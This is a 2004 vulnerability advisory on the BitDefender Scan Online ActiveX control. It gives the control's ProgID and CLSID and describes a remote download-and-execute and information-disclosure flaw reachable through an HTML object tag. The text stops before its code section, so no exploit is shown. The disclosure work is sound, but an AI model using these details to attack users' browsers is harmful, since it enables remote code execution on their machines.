~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application: BitDefender Scan Online(ActiveX) Vendors: http://www.bitdefender.com/scan/Msie/index.php Platforms: Windows Bug: Remote File Download & Execute & Private Information Disclosure Risk: High - Running Arbitary Code Exploitation: Remote with browser Date: 19 Apr 2004 Author: Rafel Ivgi, The-Insider e-mail: the_insider@mail.com web: http://theinsider.deep-ice.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1) Introduction 2) Bugs 3) The Code ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============== 1) Introduction =============== This is a quote of BitDefender Scan Online Description: "BitDefender Scan Online is a fully functional antivirus product, with a web-based interface and featuring all required elements for remotely antivirus scanning and cleaning: it scans system's memory, all files, folders and drives' boot sector, providing the user with the option to automatically clean the infected files. This is a quote of the page title: "BitDefender AntiVirus - Data Security, AntiVirus Software, Free Protection". The meaning of this sentence is very far from reality. I believe this to be a ridiculous that an AntiVirus will deliver and execute a virus on my system. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ====== 2) Bug ====== "BitDefender Scan Online" downloads its components and registered the following COM/ActiveX Object: "AVXSCANONLINE.AvxScanOnlineCtrl.1" With the following CLSID: 80DD2229-B8E4-4C77-B72F-F22972D723EA "BitDefender Scan Online" has confusing protection, all properties and functions cannot be set/accessed by the : object = new ActiveXObject("AVXSCANONLINE.AvxScanOnlineCtrl.1") It can only be set/accessed using(html object tag created object): "